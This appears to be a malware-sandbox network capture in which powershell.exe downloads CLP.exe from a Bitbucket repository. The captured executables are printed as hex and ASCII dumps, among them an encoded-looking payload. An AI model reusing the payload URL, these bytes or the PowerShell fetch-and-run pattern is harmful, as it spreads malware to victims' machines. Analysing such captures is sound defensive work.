                                                                                                  Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com ap [TRUNCATED]
                                                                                                  X-Usage-Quota-Remaining: 996071.813
                                                                                                  X-Usage-Request-Cost: 3951.77
                                                                                                  X-Usage-User-Time: 0.032570
                                                                                                  X-Usage-System-Time: 0.015983
                                                                                                  X-Usage-Input-Ops: 280
                                                                                                  X-Usage-Output-Ops: 0
                                                                                                  Age: 483
                                                                                                  Accept-Ranges: bytes
                                                                                                  X-Cache: HIT
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                  Atl-Traceid: 61c489dfb9144c0ba001fe9d249590dc
                                                                                                  Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                  Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                  Server-Timing: atl-edge;dur=93,atl-edge-internal;dur=2,atl-edge-upstream;dur=92,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                  Connection: close
                                                                                                  2024-10-04 17:13:18 UTC12357INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0d b0 bd 17 49 d1 d3 44 49 d1 d3 44 49 d1 d3 44 7f f7 d8 44 48 d1 d3 44 ca cd dd 44 5d d1 d3 44 7f f7 d9 44 02 d1 d3 44 8a de 8e 44 44 d1 d3 44 49 d1 d2 44 21 d1 d3 44 a1 ce d9 44 48 d1 d3 44 49 d1 d3 44 48 d1 d3 44 52 69 63 68 49 d1 d3 44 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0b 52 a9 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 90 00 00 00 a0 02 00 00 00 00
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$IDIDIDDHDD]DDDDDDID!DDHDIDHDRichIDPELRc
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 45 cc 89 45 c4 8b 45 e0 83 60 28 00 83 7d c4 00 74 4c 8b 45 c4 89 45 c8 8b 45 c8 8b 40 28 3b 45 cc 74 0b 8b 45 c8 8b 40 28 89 45 bc eb 04 83 65 bc 00 8b 45 bc 89 45 c4 8b 45 c8 8b 40 04 89 45 b8 83 7d b8 01 74 02 eb 13 ff 75 c8 8b 45 c8 ff 30 ff 75 e0 e8 7b eb ff ff 83 c4 0c eb ae 8b 45 e0 83 78 2c 00 0f 84 ca 00 00 00 8b 45 e0 8b 40 2c 89 45 c0 8b 45 e0 8b 4d c0 8b 49 18 89 48 2c 8b 45 c0 8b 40 1c 24 fb 8b 4d c0 89 41 1c 8b 45 c0 8b 40 0c 89 45 b4 83 7d b4 01 74 1a 83 7d b4 03 74 05 e9 88 00 00 00 ff 75 c0 ff 75 e0 e8 b5 e3 ff ff 59 59 eb 79 8b 45 c0 8b 40 1c 83 e0 01 85 c0 74 6c 8b 45 c0 0f be 40 50 85 c0 75 61 8b 45 c0 8b 40 14 8b 4d c0 8b 49 10 89 08 8b 45 c0 8b 40 10 8b 4d c0 8b 49 14 89 48 04 33 c0 85 c0 75 dd 8b 45 c0 8b 40 08 8b 40 04 48 8b 4d c0
                                                                                                  Data Ascii: EEE`(}tLEEE@(;EtE@(EeEEE@E}tuE0u{Ex,E@,EEMIH,E@$MAE@E}t}tuuYYyE@tlE@PuaE@MIE@MIH3uE@@HM
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 12 43 00 20 8a 94 05 ec fc ff ff eb e3 80 a0 c0 11 43 00 00 40 41 41 3b c6 72 bf eb 49 33 c0 be 00 01 00 00 83 f8 41 72 19 83 f8 5a 77 14 80 88 c1 12 43 00 10 8a c8 80 c1 20 88 88 c0 11 43 00 eb 1f 83 f8 61 72 13 83 f8 7a 77 0e 80 88 c1 12 43 00 20 8a c8 80 e9 20 eb e0 80 a0 c0 11 43 00 00 40 3b c6 72 be 5e c9 c3 83 3d e8 14 43 00 00 75 12 6a fd e8 18 fc ff ff 59 c7 05 e8 14 43 00 01 00 00 00 c3 ff 35 9c 10 43 00 ff 74 24 08 e8 03 00 00 00 59 59 c3 83 7c 24 04 e0 77 22 ff 74 24 04 e8 1c 00 00 00 85 c0 59 75 16 39 44 24 08 74 10 ff 74 24 04 e8 aa 13 00 00 85 c0 59 75 de 33 c0 c3 55 8b ec 6a ff 68 88 cb 42 00 68 54 5b 40 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 0c 53 56 57 a1 d4 13 43 00 83 f8 03 75 43 8b 75 08 3b 35 a8 11 43 00 0f 87 93 00 00 00
                                                                                                  Data Ascii: C C@AA;rI3ArZwC CarzwC C@;r^=CujYC5Ct$YY|$w"t$Yu9D$tt$Yu3UjhBhT[@dPd%SVWCuCu;5C
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 09 44 00 00 00 1d 20 09 44 00 00 00 1d 08 00 00 00 00 1e 09 10 00 00 00 08 00 00 00 00 20 09 10 00 00 00 1d 21 08 09 20 00 00 00 08 1e 04 00 00 05 20 09 14 00 00 00 09 20 00 00 00 1d 20 09 10 00 00 00 1d 21 08 09 24 00 00 00 08 14 04 00 00 05 20 09 1c 00 00 00 09 24 00 00 00 1d 20 09 10 00 00 00 1d 09 40 00 00 00 1d 26 1b 21 08 09 28 00 00 00 08 e0 03 00 00 05 20 09 18 00 00 00 09 28 00 00 00 1d 20 09 18 00 00 00 1d 08 00 00 00 00 10 a4 04 00 00 09 1c 00 00 00 1d 04 38 00 00 00 08 e6 04 00 00 0a 09 18 00 00 00 1d 21 08 09 14 00 00 00 1d 23 21 0c 09 2c 00 00 00 08 4b 04 00 00 05 20 09 30 00 00 00 09 1c 00 00 00 1d 09 44 00 00 00 1d 26 20 09 30 00 00 00 1d 09 30 00 00 00 1d 1b 09 2c 00 00 00 1d 2f 1e 09 14 00 00 00 1d 08 00 00 00 00 10 da 04 00 00 09 18 00
                                                                                                  Data Ascii: D D ! !$ $ @&!( ( 8!#!,K 0D& 00,/
                                                                                                  2024-10-04 17:13:19 UTC6338INData Raw: 46 39 4f 41 50 55 44 59 41 43 59 34 39 47 39 48 5a 4d 49 53 52 51 45 59 47 49 41 59 5a 58 35 52 45 44 52 37 59 45 44 59 41 4d 4d 4d 52 39 35 41 4b 58 4b 52 49 41 45 4b 43 45 46 38 41 35 35 37 43 57 35 48 55 51 49 51 50 43 44 41 59 46 51 58 53 34 4d 42 4f 57 42 51 42 48 51 47 41 4c 4a 57 43 36 48 4d 38 45 51 4e 41 59 45 50 45 48 49 34 49 56 5a 48 59 46 39 4f 58 53 4d 4f 42 42 45 45 52 44 5a 42 43 50 50 49 59 45 4f 52 51 41 46 36 43 45 55 4d 44 46 4b 42 50 51 42 49 41 48 42 57 45 4c 38 45 45 41 4c 36 41 45 47 55 41 48 42 55 49 4c 38 45 46 41 4c 36 44 38 44 54 35 4e 51 4b 57 4a 52 50 59 51 59 42 50 51 4f 51 50 39 42 51 51 4c 38 45 56 49 36 42 50 51 4e 51 50 39 42 4f 55 4c 32 30 30 31 31 32 31 32 32 32 31 32 38 45 49 41 4c 36 44 34 36 51 50 39 42 4d 59 43 38
                                                                                                  Data Ascii: F9OAPUDYACY49G9HZMISRQEYGIAYZX5REDR7YEDYAMMMR95AKXKRIAEKCEF8A557CW5HUQIQPCDAYFQXS4MBOWBQBHQGALJWC6HM8EQNAYEPEHI4IVZHYF9OXSMOBBEERDZBCPPIYEORQAF6CEUMDFKBPQBIAHBWEL8EEAL6AEGUAHBUIL8EFAL6D8DT5NQKWJRPYQYBPQOQP9BQQL8EVI6BPQNQP9BOUL2001121222128EIAL6D46QP9BMYC8
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 42 47 44 35 59 53 39 49 4a 41 49 4c 59 57 46 36 55 43 55 48 39 39 4f 58 55 47 52 53 43 4e 4f 41 37 43 43 42 36 51 39 5a 44 53 38 37 4d 56 39 37 43 38 52 41 35 37 50 39 55 41 51 37 55 5a 52 56 43 38 41 49 5a 51 4e 45 47 50 41 59 42 44 47 41 45 4e 52 51 49 37 45 54 54 50 46 37 59 50 51 53 51 54 43 51 4c 37 36 41 41 41 38 41 36 46 53 37 53 53 38 37 5a 50 52 45 58 5a 57 4b 4a 57 45 57 58 53 44 44 34 46 58 42 56 41 43 4d 44 51 44 4a 49 55 45 4e 41 56 48 45 55 48 36 36 53 4a 45 4b 47 55 4c 56 46 50 41 42 46 50 42 4c 58 51 4d 43 45 55 4c 5a 41 4a 43 4d 38 5a 38 36 41 41 4c 59 47 39 41 37 50 45 37 47 48 4f 57 49 58 45 38 45 51 43 41 45 4c 51 38 36 58 51 53 50 59 35 48 38 4f 53 4f 54 46 49 46 42 42 54 4a 57 5a 54 38 34 52 52 41 56 53 57 4b 45 39 37 49 56 51 53 4d
                                                                                                  Data Ascii: BGD5YS9IJAILYWF6UCUH99OXUGRSCNOA7CCB6Q9ZDS87MV97C8RA57P9UAQ7UZRVC8AIZQNEGPAYBDGAENRQI7ETTPF7YPQSQTCQL76AAA8A6FS7SS87ZPREXZWKJWEWXSDD4FXBVACMDQDJIUENAVHEUH66SJEKGULVFPABFPBLXQMCEULZAJCM8Z86AALYG9A7PE7GHOWIXE8EQCAELQ86XQSPY5H8OSOTFIFBBTJWZT84RRAVSWKE97IVQSM
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 44 4e 44 54 45 47 55 55 4c 4d 4f 41 56 49 52 52 42 4d 4a 42 46 4b 4d 54 43 4c 37 4f 46 53 49 52 41 34 42 45 42 47 42 4b 4a 4f 4d 58 43 38 56 47 46 45 4c 4d 4f 4d 51 51 39 59 55 54 43 41 45 59 46 41 52 4d 58 47 4c 37 44 51 4e 59 59 51 43 44 44 35 4a 51 34 48 44 45 44 34 49 53 5a 4e 41 4e 45 51 57 5a 4a 58 49 47 55 45 54 49 56 50 38 45 50 49 53 52 4a 34 36 5a 50 51 49 36 55 48 36 4b 56 4e 5a 52 58 45 36 4b 48 34 42 39 55 49 57 4c 54 46 36 39 5a 49 4f 4b 44 34 41 45 47 47 4c 54 42 55 54 37 45 41 4b 58 47 37 59 50 51 57 45 44 52 49 49 56 4e 44 49 44 39 49 46 50 4b 44 55 50 34 53 35 45 45 5a 59 42 5a 49 4f 4d 54 4a 5a 53 43 34 44 36 55 55 4c 48 54 4e 4b 41 48 43 51 52 4e 53 35 49 58 43 49 4b 46 54 55 57 55 37 54 5a 41 41 46 59 4b 46 41 41 49 4d 4c 42 34 4e 38
                                                                                                  Data Ascii: DNDTEGUULMOAVIRRBMJBFKMTCL7OFSIRA4BEBGBKJOMXC8VGFELMOMQQ9YUTCAEYFARMXGL7DQNYYQCDD5JQ4HDED4ISZNANEQWZJXIGUETIVP8EPISRJ46ZPQI6UH6KVNZRXE6KH4B9UIWLTF69ZIOKD4AEGGLTBUT7EAKXG7YPQWEDRIIVNDID9IFPKDUP4S5EEZYBZIOMTJZSC4D6UULHTNKAHCQRNS5IXCIKFTUWU7TZAAFYKFAAIMLB4N8
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 4d 4f 41 58 4f 4b 54 49 53 52 47 57 51 48 44 49 51 52 47 57 51 42 59 4f 4e 42 34 45 34 5a 5a 34 43 44 34 34 46 50 54 35 4f 4a 5a 4f 4f 44 36 46 4d 58 51 49 43 47 55 51 39 53 42 39 57 42 59 44 4c 37 38 4f 4a 41 45 4d 34 50 4b 48 39 4d 51 49 4f 4c 47 59 4c 35 42 4f 41 58 59 47 44 4d 52 38 41 41 35 58 41 35 54 51 38 54 44 38 52 34 47 59 4f 4f 35 4f 47 51 46 51 53 46 55 50 59 4f 58 44 49 50 57 46 47 36 58 49 51 58 4d 56 38 37 53 41 4d 42 48 4a 42 55 4b 54 48 50 44 4b 4c 4d 44 47 57 44 38 44 52 49 37 44 52 4d 4f 51 47 59 4b 59 4b 41 44 57 44 34 44 38 4f 44 38 48 57 55 53 58 51 56 34 38 51 44 36 45 36 54 55 56 48 37 42 46 4e 38 49 4b 41 4b 52 35 4d 49 37 36 4f 37 42 42 4d 5a 43 57 45 45 4c 49 34 49 41 39 39 4e 44 55 41 4e 42 34 42 42 45 45 4e 46 53 48 52 35 44
                                                                                                  Data Ascii: MOAXOKTISRGWQHDIQRGWQBYONB4E4ZZ4CD44FPT5OJZOOD6FMXQICGUQ9SB9WBYDL78OJAEM4PKH9MQIOLGYL5BOAXYGDMR8AA5XA5TQ8TD8R4GYOO5OGQFQSFUPYOXDIPWFG6XIQXMV87SAMBHJBUKTHPDKLMDGWD8DRI7DRMOQGYKYKADWD4D8OD8HWUSXQV48QD6E6TUVH7BFN8IKAKR5MI76O7BBMZCWEELI4IA99NDUANB4BBEENFSHR5D
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 53 47 43 4c 41 42 35 51 41 56 4f 4c 41 55 54 51 39 56 42 46 4d 36 4b 56 42 43 45 51 46 43 4b 49 55 36 53 4f 54 48 50 39 36 41 4c 35 41 46 53 57 51 45 49 38 50 43 4b 34 46 52 56 4c 42 39 35 52 4a 55 47 4f 53 45 4d 47 45 47 5a 4b 54 49 42 4a 57 45 53 43 37 4d 50 53 51 51 36 35 38 42 53 4c 58 37 42 43 49 58 37 37 47 4b 4a 4d 50 4d 44 58 57 42 41 4a 43 36 34 51 45 43 41 4c 39 45 56 39 52 46 45 43 42 44 35 52 56 52 57 58 42 36 46 43 51 57 52 56 56 55 45 4c 48 4d 51 46 37 51 36 4c 41 42 56 4c 42 50 53 51 34 44 4a 45 55 59 4c 55 46 46 39 4a 34 59 4d 44 59 41 36 46 42 34 43 48 38 50 41 39 4f 5a 51 36 37 38 43 47 41 57 4e 49 49 42 4d 38 38 37 41 50 45 53 39 5a 41 5a 4c 57 42 44 39 55 47 54 51 4d 49 51 51 4d 39 56 4d 36 34 42 36 4d 41 51 43 4a 34 4c 39 56 54 42 50
                                                                                                  Data Ascii: SGCLAB5QAVOLAUTQ9VBFM6KVBCEQFCKIU6SOTHP96AL5AFSWQEI8PCK4FRVLB95RJUGOSEMGEGZKTIBJWESC7MPSQQ658BSLX7BCIX77GKJMPMDXWBAJC64QECAL9EV9RFECBD5RVRWXB6FCQWRVVUELHMQF7Q6LABVLBPSQ4DJEUYLUFF9J4YMDYA6FB4CH8PA9OZQ678CGAWNIIBM887APES9ZAZLWBD9UGTQMIQQM9VM64B6MAQCJ4L9VTBP
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 59 41 41 42 56 39 37 39 4f 41 4d 56 57 44 47 4d 52 4f 4d 52 57 4b 36 46 44 43 45 41 41 43 46 58 4b 51 4f 4f 5a 57 41 4c 46 4b 50 48 49 48 46 4e 34 51 4e 35 47 56 41 56 4c 4e 4b 42 43 34 46 51 35 43 4f 4c 4c 56 42 59 49 52 35 5a 49 56 49 5a 4b 51 4a 55 59 48 54 55 48 51 4c 36 42 47 38 46 44 42 4d 52 54 4b 57 59 46 4b 4d 54 39 56 4b 35 54 4e 4d 46 59 46 4d 34 4c 46 4e 37 35 55 38 5a 53 47 35 54 41 41 41 54 49 37 50 49 39 51 41 41 43 50 4f 42 53 57 36 4a 4c 52 46 4a 59 50 53 36 45 4c 59 42 37 51 45 53 44 46 4d 46 59 45 4e 36 35 53 4d 58 34 36 45 54 54 52 49 46 57 47 59 35 39 37 4d 4e 44 34 41 52 35 46 4f 52 49 48 45 35 39 50 4d 4e 53 58 47 36 34 4f 4f 45 41 41 41 56 52 39 4e 46 5a 48 49 37 4c 42 4e 52 4a 48 45 37 54 55 35 5a 50 48 4b 41 44 51 4f 4a 53 38 4a
                                                                                                  Data Ascii: YAABV979OAMVWDGMROMRWK6FDCEAACFXKQOOZWALFKPHIHFN4QN5GVAVLNKBC4FQ5COLLVBYIR5ZIVIZKQJUYHTUHQL6BG8FDBMRTKWYFKMT9VK5TNMFYFM4LFN75U8ZSG5TAAATI7PI9QAACPOBSW6JLRFJYPS6ELYB7QESDFMFYEN65SMX46ETTRIFWGY597MND4AR5FORIHE59PMNSXG64OOEAAAVR9NFZHI7LBNRJHE7TU5ZPHKADQOJS8J


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.449731185.166.143.494437520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-04 17:13:19 UTC118OUTGET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe HTTP/1.1
                                                                                                  Host: bitbucket.org
                                                                                                  2024-10-04 17:13:20 UTC4028INHTTP/1.1 200 OK
                                                                                                  Date: Fri, 04 Oct 2024 17:13:20 GMT
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Content-Length: 293888
                                                                                                  Server: AtlassianEdge
                                                                                                  Content-Disposition: attachment
                                                                                                  Vary: Authorization, Accept-Language, Origin
                                                                                                  Cache-Control: s-maxage=900, max-age=900
                                                                                                  Last-Modified: Tue, 10 Jan 2023 15:00:12 GMT
                                                                                                  Etag: "5d17badb31672756832ca3e395738d26"
                                                                                                  X-Used-Mesh: False
                                                                                                  Content-Language: en
                                                                                                  X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
                                                                                                  X-Dc-Location: Micros-3
                                                                                                  X-Served-By: 0ac796864926
                                                                                                  X-Version: 8e66bccd2be3
                                                                                                  X-Static-Version: 8e66bccd2be3
                                                                                                  X-Request-Count: 3374
                                                                                                  X-Render-Time: 0.09915876388549805
                                                                                                  X-B3-Traceid: 8110ffdae56f4493bc6ce66e5d12492d
                                                                                                  X-B3-Spanid: d55da61a22abe69d
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-asse [TRUNCATED]
                                                                                                  X-Usage-Quota-Remaining: 995544.552
                                                                                                  X-Usage-Request-Cost: 4484.07
                                                                                                  X-Usage-User-Time: 0.041769
                                                                                                  X-Usage-System-Time: 0.004753
                                                                                                  X-Usage-Input-Ops: 352
                                                                                                  X-Usage-Output-Ops: 0
                                                                                                  Age: 0
                                                                                                  Accept-Ranges: bytes
                                                                                                  X-Cache: MISS
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                  Atl-Traceid: 8110ffdae56f4493bc6ce66e5d12492d
                                                                                                  Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                  Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                  Server-Timing: atl-edge;dur=210,atl-edge-internal;dur=3,atl-edge-upstream;dur=209,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                  Connection: close
                                                                                                  2024-10-04 17:13:20 UTC12356INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 15 bd be a7 51 dc d0 f4 51 dc d0 f4 51 dc d0 f4 82 ae d3 f5 5c dc d0 f4 82 ae d5 f5 ff dc d0 f4 82 ae d4 f5 47 dc d0 f4 1e a0 d4 f5 40 dc d0 f4 1e a0 d3 f5 47 dc d0 f4 1e a0 d5 f5 1c dc d0 f4 82 ae d1 f5 5a dc d0 f4 51 dc d1 f4 26 dc d0 f4 90 a0 d9 f5 54 dc d0 f4 90 a0 2f f4 50 dc d0 f4 90 a0 d2 f5 50 dc d0 f4 52 69 63 68 51 dc d0 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$QQQ\G@GZQ&T/PPRichQ
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: 40 52 50 e8 54 f0 02 00 83 f8 50 0f 93 c0 8b 8c 24 94 00 00 00 33 cc e8 5e 17 01 00 8b e5 5d c3 8b 8c 24 94 00 00 00 32 c0 33 cc e8 4a 17 01 00 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 a8 2b 44 00 68 55 2c 43 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 48 50 44 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 ef be ad de ff 15 30 50 43 00 c7 45 fc fe ff ff ff 32 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 b8 01 00 00 00 c3 8b 65 e8 c7 45 fc fe ff ff ff b0 01 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 80 34 43 00 64 a1 00 00 00 00 50 81 ec 7c 02 00 00 a1 48 50 44 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 6a 00 6a 02 ff
                                                                                                  Data Ascii: @RPTP$3^]$23J]Ujh+DhU,CdPSVWHPD1E3PEdeEh0PCE2MdY_^[]eEMdY_^[]Ujh4CdP|HPD3ESVWPEdjj
                                                                                                  2024-10-04 17:13:20 UTC546INData Raw: 43 45 d8 50 ff 75 14 8d 45 b4 ff 75 10 50 53 e8 d8 fc ff ff 57 ff 75 1c 8b 08 8b 40 04 50 89 45 14 8d 45 b4 51 50 53 89 4d 10 e8 4d fc ff ff 83 c4 30 33 ff eb 20 83 7d ec 10 8d 45 d8 56 0f 43 45 d8 50 ff 75 14 8d 45 b4 ff 75 10 50 53 e8 99 fc ff ff 83 c4 18 8b 10 8b 48 04 8d 45 d8 83 7d ec 10 89 55 10 0f 43 45 d8 29 75 bc 03 c6 ff 75 bc 89 4d 14 50 51 52 8d 45 b4 50 53 e8 6b fc ff ff 8b 55 ac 8b 75 a8 57 8b 08 8b 40 04 ff 75 1c 89 4d 10 50 51 56 53 89 45 14 c7 42 20 00 00 00 00 c7 42 24 00 00 00 00 e8 cf fb ff ff 8b 4d d4 83 c4 30 83 f9 10 72 28 8b 55 c0 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 6f 51 52 e8 2c d9 00 00 83 c4 08 8b 4d ec c7 45 d0 00 00 00 00 c7 45 d4 0f 00 00 00 c6 45 c0 00 83 f9 10 72 28 8b 55 d8 41 8b
                                                                                                  Data Ascii: CEPuEuPSWu@PEEQPSMM03 }EVCEPuEuPSHE}UCE)uuMPQREPSkUuW@uMPQVSEB B$M0r(UArP#+woQR,MEEEr(UA
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: ac c7 45 fc 00 00 00 00 50 e8 ec 08 00 00 c7 45 fc ff ff ff ff 83 c4 04 8b 4d b0 89 45 b8 85 c9 74 11 8b 01 ff 50 08 8b c8 85 c9 74 06 8b 01 6a 01 ff 10 6a 00 53 8d 4d d4 e8 6c e3 ff ff 8b 4d a4 8d 45 d4 8b 55 b8 c7 45 fc 01 00 00 00 83 7d e8 10 0f 43 45 d4 8b 12 50 8d 04 0b 50 51 8b 4d b8 ff 52 1c 8b 4d a8 8b 41 30 8b 48 04 89 4d b0 8b 01 ff 50 04 8d 45 ac c6 45 fc 02 50 e8 e8 0e 00 00 c6 45 fc 01 83 c4 04 8b 55 b0 8b c8 89 4d b8 85 d2 74 16 8b 02 8b ca ff 50 08 8b c8 85 c9 74 06 8b 01 6a 01 ff 10 8b 4d b8 8b 01 8d 55 bc 52 ff 50 14 8b 4d b8 c6 45 fc 03 8b 01 8b 40 10 ff d0 88 45 a4 3b fb 74 1c 8b 4d b8 8b 01 8b 40 0c ff d0 83 7d e8 10 8a c8 8d 45 d4 0f 43 45 d4 3b fb 88 0c 38 0f 44 7d a0 8d 5d bc 83 7d d0 10 0f 43 5d bc 8a 03 3c 7f 0f 84 8f 00 00 00 84
                                                                                                  Data Ascii: EPEMEtPtjjSMlMEUE}CEPPQMRMA0HMPEEPEUMtPtjMURPME@E;tM@}ECE;8D}]}C]<
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: fc 36 33 f6 0f 28 05 10 11 44 00 0f 11 85 10 fa ff ff c7 85 20 fa ff ff 56 48 35 42 c7 85 24 fa ff ff 29 35 21 45 c7 85 28 fa ff ff 63 2b 2b 65 66 c7 85 2c fa ff ff 3c 00 90 0f b6 84 35 11 fa ff ff 8d 8d 10 fa ff ff 50 e8 0c 10 00 00 88 84 35 11 fa ff ff 46 83 fe 1c 72 df 8d 8d 10 fe ff ff c6 85 2d fa ff ff 00 c7 85 0c fe ff ff 00 00 00 00 e8 23 11 00 00 8d 8d 11 fa ff ff c6 45 fc 37 8d 51 01 66 0f 1f 44 00 00 8a 01 41 84 c0 75 f9 2b ca 8d 85 11 fa ff ff 03 c1 8d 8d 0c fe ff ff 6a 01 50 8d 85 11 fa ff ff 50 e8 5a 16 00 00 0f 28 05 90 12 44 00 33 c9 0f 11 85 8c f6 ff ff c7 85 ac f6 ff ff 51 6b 41 78 0f 28 05 e0 13 44 00 0f 11 85 9c f6 ff ff c6 85 b0 f6 ff ff 00 66 66 66 0f 1f 84 00 00 00 00 00 8a 85 8c f6 ff ff 30 84 0d 8d f6 ff ff 41 83 f9 23 72 ed ff b5
                                                                                                  Data Ascii: 63(D VH5B$)5!E(c++ef,<5P5Fr-#E7QfDAu+jPPZ(D3QkAx(Dfff0A#r
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: 74 16 80 fb 29 74 11 f6 c2 10 75 0e 8a 11 80 fa 7b 74 05 80 fa 7d 75 02 8b c1 40 89 06 8b ce e8 e6 e2 ff ff 8b 56 50 f7 c2 00 04 00 00 0f 84 6c 01 00 00 83 7e 4c 3f 0f 85 62 01 00 00 8b 06 c6 45 f4 00 3b 46 08 74 34 80 38 5c 75 2c 8d 48 01 3b 4e 08 74 24 f6 c2 08 75 0c 8a 19 80 fb 28 74 16 80 fb 29 74 11 f6 c2 10 75 0e 8a 11 80 fa 7b 74 05 80 fa 7d 75 02 8b c1 40 89 06 8b ce e8 87 e2 ff ff e9 1b 01 00 00 83 f8 3f 75 0c c7 45 f8 01 00 00 00 e9 3e ff ff ff 83 f8 7b 0f 85 12 01 00 00 8b 06 8b 56 08 3b c2 74 36 80 38 5c 75 2e 8d 48 01 3b ca 74 27 8b 56 50 f6 c2 08 75 0c 8a 19 80 fb 28 74 16 80 fb 29 74 11 f6 c2 10 75 0e 8a 11 80 fa 7b 74 05 80 fa 7d 75 02 8b c1 40 89 06 8b ce e8 22 e2 ff ff 6a 07 68 ff ff ff 7f 6a 0a 8b ce e8 92 23 00 00 3d ff ff ff 7f 0f 84
